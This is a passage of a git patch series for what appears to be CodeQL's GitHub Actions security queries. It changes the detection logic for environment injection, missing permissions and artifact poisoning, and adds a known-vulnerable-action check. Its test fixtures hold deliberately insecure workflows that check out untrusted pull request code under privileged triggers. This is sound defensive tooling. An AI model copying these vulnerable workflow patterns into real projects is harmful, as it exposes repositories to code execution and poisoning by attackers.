"(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = - trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + - trimQuotes(script.regexpCapture(regexp, 5)) + + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" ) } @@ -146,8 +146,8 @@ predicate blockFileWrite(string script, string cmd, string file, string content, content = script .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") - .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and file = trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and filters = "" diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index ee9f4843470..fc45b8c041d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -35,7 +35,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 652b97b887f..f7a9283f800 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -37,7 +37,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index a67be6e3562..4fe3268c00a 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -44,7 +44,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) From 8ffac2935e609166d772db15342b9084cbd04527 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:22:20 +0200 Subject: [PATCH 0435/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7daf7247f25..93f6688d2b4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.26 +version: 0.1.27 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b844148e7a2..6ceb57f0946 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.26 +version: 0.1.27 groups: [actions, queries] suites: codeql-suites extractor: javascript From ab8dd599b75f77aec1ca76c3f67a2a013d9aebcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 11:45:30 +0200 Subject: [PATCH 0436/1267] fix(queries): Fix Missing Permissions query If a job is only triggered by `workflow_call`, we dont report any issues since they should be reported on the calling workflows --- .../CWE-275/MissingActionsPermissions.ql | 12 +++++++----- .../workflows/{missing_perms.yml => perms1.yml} | 0 .../CWE-275/.github/workflows/perms2.yml | 16 ++++++++++++++++ .../.github/workflows/{perms.yml => perms3.yml} | 0 .../CWE-275/.github/workflows/perms4.yml | 11 +++++++++++ .../CWE-275/.github/workflows/perms5.yml | 12 ++++++++++++ .../CWE-275/MissingActionsPermissions.expected | 4 +++- 7 files changed, 49 insertions(+), 6 deletions(-) rename ql/test/query-tests/Security/CWE-275/.github/workflows/{missing_perms.yml => perms1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml rename ql/test/query-tests/Security/CWE-275/.github/workflows/{perms.yml => perms3.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index ffb217739c7..d2969b7d6e7 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,13 @@ import actions -from Workflow workflow, Job job +from Job job where - job = workflow.getAJob() and - ( - not exists(workflow.getPermissions()) and - not exists(job.getPermissions()) + not exists(job.getPermissions()) and + not exists(job.getEnclosingWorkflow().getPermissions()) and + // exists a trigger event that is not a workflow_call + exists(Event e | + e = job.getATriggerEvent() and + not e.getName() = "workflow_call" ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml new file mode 100644 index 00000000000..6f7844f17cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -0,0 +1,16 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + test: + name: Build and test + runs-on: ubuntu-latest + permissions: {} + steps: + - uses: actions/checkout@v2 + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml new file mode 100644 index 00000000000..16930cfb07c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml @@ -0,0 +1,11 @@ +on: + workflow_call: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml new file mode 100644 index 00000000000..4353c280497 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -0,0 +1,12 @@ +on: + workflow_call: + workflow_dispatch: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index c26769a692e..8f94d0dc45a 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1,3 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms1.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms2.yml:6:5:10:2 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms5.yml:7:5:10:32 | Job: build | Actions Job or Workflow does not set permissions | From d548aef3e068e35562095e4a119f9434659a46d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 16:31:15 +0200 Subject: [PATCH 0437/1267] feat(queries): Add actions/download-artifact as a source of Artifact Poisoning --- .../security/ArtifactPoisoningQuery.qll | 18 ++++++++--- .../.github/workflows/artifactpoisoning81.yml | 31 +++++++++++++++++++ .../.github/workflows/artifactpoisoning82.yml | 31 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 7 +++++ .../CWE-829/ArtifactPoisoningMedium.expected | 7 +++++ .../UntrustedCheckoutCritical.expected | 6 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 7 files changed, 98 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 541498ae574..08a49ab1abb 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -18,11 +18,21 @@ abstract class UntrustedArtifactDownloadStep extends Step { class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { GitHubDownloadArtifactActionStep() { - // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. - // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers this.getCallee() = "actions/download-artifact" and - this.getArgument("run-id").matches("%github.event.workflow_run.id%") and - exists(this.getArgument("github-token")) + ( + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + or + // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step + exists(UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + ) } override string getPath() { diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml new file mode 100644 index 00000000000..7aa190007d8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request_target + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml new file mode 100644 index 00000000000..6ae7f482f55 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c987f63115a..56ec92c54b6 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -42,6 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -58,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 57d7ff9d64b..da10247f1e0 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -42,5 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 092a7187951..93e816fe1f9 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -26,6 +26,12 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 05931dfe312..9f3e500817a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,5 @@ +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2b55d79c93a98f420613999e28475a1f0a9b04ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 18:29:17 +0200 Subject: [PATCH 0438/1267] feat(queries): Add query to report vulnerable 3rd party actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 38 +++++++++++++++++++ .../CWE-1395/.github/workflows/test1.yml | 23 +++++++++++ .../UseOfKnownVulnerableAction.expected | 9 +++++ .../CWE-1395/UseOfKnownVulnerableAction.qlref | 2 + 4 files changed, 72 insertions(+) create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql create mode 100644 ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql new file mode 100644 index 00000000000..5767619a5ca --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -0,0 +1,38 @@ +/** + * @name Use of known vulnerable 3rd party action. + * @description The workflow is using a known vulnerable 3rd party action. + * @kind problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id actions/vulnerable-action + * @tags actions + * security + * external/cwe/cwe-1395 + */ + +import actions + +// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate +from UsesStep step +where + step.getCallee() = "actions/download-artifact" and + ( + step.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + step.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) +select step, "The workflow is using a known vulnerable version ($@) of the $@ action.", step, + step.getVersion(), step, step.getCallee() diff --git a/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml new file mode 100644 index 00000000000..39b1af673a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -0,0 +1,23 @@ +name: Test + +on: + issues: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/download-artifact@v1 + - uses: actions/download-artifact@v1.0.0 + - uses: actions/download-artifact@v2 + - uses: actions/download-artifact@v2.1.0 + - uses: actions/download-artifact@v3 + - uses: actions/download-artifact@v3.0.2 + - uses: actions/download-artifact@v4.1.0 + - uses: actions/download-artifact@87c55149d96e628cc2ef7e6fc2aab372015aec85 # v4.1.3 + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 + - uses: actions/download-artifact@v4 # SECURE + - uses: actions/download-artifact@v4.1.7 # SECURE + - uses: actions/download-artifact@v4.1.8 # SECURE + - uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8 SECURE + - uses: actions/download-artifact@65a9edc5881444af0b9093a5e628f2fe47ea3b2e # v4.1.7 SECURE diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected new file mode 100644 index 00000000000..0a8c593cd86 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected @@ -0,0 +1,9 @@ +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the 